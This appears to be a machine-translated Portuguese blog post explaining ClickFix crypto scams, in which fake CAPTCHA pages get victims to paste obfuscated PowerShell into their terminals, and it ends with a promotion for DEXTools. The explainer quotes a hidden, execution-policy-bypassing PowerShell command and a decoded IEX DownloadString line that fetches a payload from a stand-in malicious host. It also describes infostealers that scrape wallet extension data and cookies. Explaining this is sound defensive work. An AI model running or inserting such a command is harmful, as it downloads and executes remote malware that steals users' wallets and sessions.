Golpes de criptografia ClickFix: CAPTCHAs falsos que roubam carteiras

O phishing evoluiu além das páginas básicas de login falsas. Detalhamos a engenharia social e a mecânica de execução de terminal por trás dos ataques de drenagem de criptografia ClickFix.
CAPTCHAs falsos e roubo de carteira criptografada ClickFix
- O surgimento de Golpes de criptografia ClickFix contorna completamente esses firewalls mentais tradicionais. Em vez de tentar induzi-lo a assinar uma transação maliciosa na cadeia ou digitar suas chaves privadas em um formulário de phishing, os ataques ClickFix exploram o relacionamento operacional entre um usuário e seu sistema operacional local. Ao encenar erros de navegador artificiais altamente convincentes e telas falsas de verificação CAPTCHA, esses ataques induzem os usuários a copiar e colar scripts criptografados diretamente nos terminais do sistema local.
- Os vetores que regem o roubo de ativos digitais mudaram do engano passivo para a exploração agressiva de terminais imposta pelo usuário. Durante anos, o manual básico de defesa para finanças descentralizadas Os participantes do (DeFi) se concentraram fortemente na interceptação de páginas de login falsas, na auditoria de assinaturas de aprovação de contratos inteligentes e na proteção de frases iniciais brutas contra entradas maliciosas. Se um alocador mantivesse o hábito disciplinado de verificar URLs e verificar cuidadosamente as telas de confirmação da carteira de hardware, seu capital na rede permaneceria estruturalmente isolado.
- O navegador da web não falhou; a cautela da vítima ocorreu sob pressão. Este guia detalha os truques de engenharia social, a mecânica da linha de comando e os loops de exfiltração que definem a arquitetura ClickFix.

1. A psicologia da armadilha: a interface falsa do CAPTCHA
- Para analisar um ataque ClickFix com precisão técnica, você deve primeiro reconhecer que ele começa como uma pura jogada de engenharia social. O ataque geralmente se manifesta quando um usuário visita um blog Web3 comprometido, um front-end de protocolo duplicado ou um portal de rastreamento falso.
Em vez de apresentar um prompt óbvio de conexão com a carteira, a página aciona um bloqueio mecânico imediato.
- A tela exibe uma janela interativa altamente refinada que imita uma verificação de segurança padrão, como o Turnstile da Cloudflare, um loop Google reCAPTCHA v3 ou um alerta crítico de falha na atualização do navegador (por exemplo, "Erro de atualização do Chrome: falha na ingestão do Direct3D").
- Quando o usuário tenta concluir a verificação, a interface exibe uma notificação direcionada informando que a verificação automatizada falhou devido a um conflito de renderização localizado. A tela então fornece uma “correção manual” passo a passo.
- Ao fabricar um problema técnico urgente, o golpe altera o estado psicológico da vítima de consumidor defensivo para técnico de solução de problemas, tornando-a muito mais disposta a seguir comandos incomuns do computador.
2. O pipeline de execução de comando: da área de transferência ao terminal
- O verdadeiro perigo da metodologia ClickFix é sua capacidade de ignorar completamente a segurança da sandbox no nível do navegador. Os navegadores da Web são projetados para evitar que códigos não confiáveis da Internet manipulem diretamente o hardware do seu computador ou executem aplicativos de software em segundo plano.
- ClickFix evita essa barreira enganando o usuário para agir como a ponte que transporta o software malicioso através das paredes de segurança do navegador.
A mecânica de injeção passo a passo
Etapa 1: O sequestro da área de transferência: O pop-up de verificação falso instrui o usuário a clicar em um botão denominado “Copiar código de correção” ou “Copiar token de verificação”. Quando clicado, o JavaScript do site copia uma sequência de comandos maliciosa e oculta diretamente na área de transferência do sistema do usuário.
Etapa 2: Atalhos de ingestão de terminal: A interface apresenta instruções gráficas claras direcionando o usuário para abrir o utilitário de comando nativo do seu sistema operacional. Para usuários do Windows, diz-lhes para pressionar
Windows Key + Rpara invocar a janela Executar, digitecmdoupowershelle pressione Enter. Para usuários do macOS, ele os instrui a abrir o aplicativo Terminal nativo por meio da pesquisa Spotlight.Etapa 3: O gatilho de colagem: As instruções orientam o usuário a clicar com o botão direito dentro da janela aberta do terminal ou pressionar
Ctrl + V(ouCmd + Vno Mac) para colar a "string de verificação copiada" e clicar em executar.
3. Desconstruindo a carga útil: a exploração do PowerShell Base64
Quando a vítima cola a string copiada em seu terminal, ela não está colando uma chave de verificação inofensiva. Eles estão executando uma sequência de comandos altamente compactada, ofuscada e frequentemente codificada em Base64, projetada para ativar um loop de download silencioso.
Uma carga útil de comando ClickFix típica direcionada a sistemas Windows utiliza ferramentas utilitárias padrão do PowerShell para extrair um arquivo de malware de segundo estágio de um servidor remoto:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc [Base64_ObfuscateQuando decodificado pelo sistema, este comando em segundo plano se traduz em um script de download automatizado agressivo:
IEX (New-Object Net.WebClient).DownloadString('https://malicious-distribution-node.cdn/payload.ps1')
A Matriz de Exploração do Sistema
| Parâmetro do terminal | Objetivo de conformidade do sistema | Objetivo de exploração maliciosa |
-NoP (Sem perfil) | Impede que o terminal carregue perfis de usuário personalizados. | Acelera a velocidade de execução e ignora alertas de perfil localizados. |
-NonI (Não interativo) | Desativa prompts interativos ou mensagens de confirmação. | Garante que o script seja executado completamente em segundo plano, sem a necessidade de entrada do usuário. |
-W Hidden (WindowStyle oculto) | Força a execução do terminal a ser executada em um estado invisível. | Oculta a atividade de download da visualização da área de trabalho para evitar alertar a vítima. |
-Exec Bypass | Substitui restrições de execução padrão do sistema. | Desativa explicitamente as configurações de segurança que impedem a execução de scripts não autorizados. |
IEX (Expressão de invocação) | Avalia e executa qualquer expressão de string como um comando local. | Baixa e executa instantaneamente a carga útil de roubo de carteira diretamente na memória ativa. |
4. O que é roubado: a carga útil do Infostealer da carteira
- Depois que a carga útil do segundo estágio é executada dentro da memória do sistema, ela implanta uma classe de utilitário especializada conhecida como Ladrão de informações (Infostealer), como Lumma Stealer, Vidar ou Medusa. Este malware não tem como alvo seus documentos gerais ou histórico de pesquisa; ele é projetado com precisão para atacar a pegada de seus ativos digitais.
- O Infostealer tem como alvo programaticamente os diretórios de pastas locais onde os navegadores da web armazenam extensões e arquivos de estado do aplicativo. Ele raspa ativamente o
.ldbe.logmapas de dados pertencentes a extensões Web3 populares como MetaMask, Phantom, Coinbase Wallet e Rabby.
Esses arquivos locais abrigam as chaves criptografadas do cofre da sua carteira. Simetricamente, o malware extrai cookies do navegador e tokens de sessão ativa.
- Todos esses dados extraídos são compactados em um arquivo compactado e enviados instantaneamente por um canal criptografado de volta ao servidor do invasor. Depois que os hackers possuírem esses tokens de sessão e cofres locais, eles podem usar força bruta nas senhas de sua carteira off-line ou sequestrar suas sessões ativas, drenando todos os ativos de todo o seu portfólio de múltiplas cadeias em minutos.
5. Por que as proteções de segurança tradicionais falham
O principal motivo pelo qual os golpes de criptografia ClickFix alcançam uma alta taxa de sucesso é que eles ignoram sistematicamente as ferramentas antivírus padrão e as extensões do navegador da web.
A lacuna de segurança estrutural: Como o site malicioso não força fisicamente o download de um
.exeou.dmgatravés de canais de navegador padrão, os sistemas de defesa do navegador não apresentam absolutamente nenhum risco. O usuário é quem copia o texto e abre manualmente o terminal do sistema.
Do ponto de vista do sistema operacional, abrir o PowerShell ou Terminal e executar um comando administrativo é uma atividade rotineira e privilegiada explicitamente autorizada pelo proprietário do computador. Como o código geralmente é executado diretamente na memória ativa, sem salvar arquivos executáveis pesados e não verificados no disco rígido local, o software antivírus básico baseado em assinaturas frequentemente falha em sinalizar a atividade até que o ciclo de exfiltração de dados já tenha sido concluído.
6. Estratégias de proteção on-chain e telemetria via DEXTools
- A defesa contra ameaças modernas de engenharia social requer a manutenção de limites rígidos em torno do terminal do sistema, juntamente com a visibilidade em tempo real dos movimentos ao vivo na cadeia. Se você suspeitar que uma configuração de ativo foi comprometida por uma possível violação de infostealer local, rastrear registros de dados de carteira ativa e auditar permissões de contrato pendentes em locais descentralizados é o único método para preservar o capital restante.
- DEXTools fornece a infraestrutura crítica de dados analíticos necessária para monitorar a atividade de token e a estabilidade da carteira em múltiplas redes de camada 1 e camada 2. Ao utilizar exploradores de pares em tempo real, rastreamento de transações em múltiplas cadeias e auditorias de segurança de contratos de tokens, os participantes do mercado podem verificar de forma independente se interações inesperadas de carteira ou transferências suspeitas de fundos estão se manifestando na cadeia.
Você pode acessar DEXTools aqui e comece a negociar hoje!
Explicação dos ataques de drenagem de carteira: como reconhecer e evitar Lista de verificação de segurança da carteira: 10 etapas obrigatórias antes de segurar Principais ferramentas de segurança de token em 2026: verificações de golpes, auditorias e análises de risco Golpes de drenagem de carteira TON: como se manter seguroIsenção de responsabilidade: Este artigo é apenas para fins informativos e não constitui aconselhamento de investimento, aconselhamento financeiro, aconselhamento comercial ou qualquer outro tipo de aconselhamento. DEXTools não recomenda comprar, vender ou manter qualquer criptomoeda ou token. Os usuários devem realizar suas próprias pesquisas e consultar um consultor financeiro qualificado antes de tomar qualquer decisão de investimento. Os investimentos em criptomoedas são voláteis e de alto risco. DEXTools não é responsável por quaisquer perdas incorridas.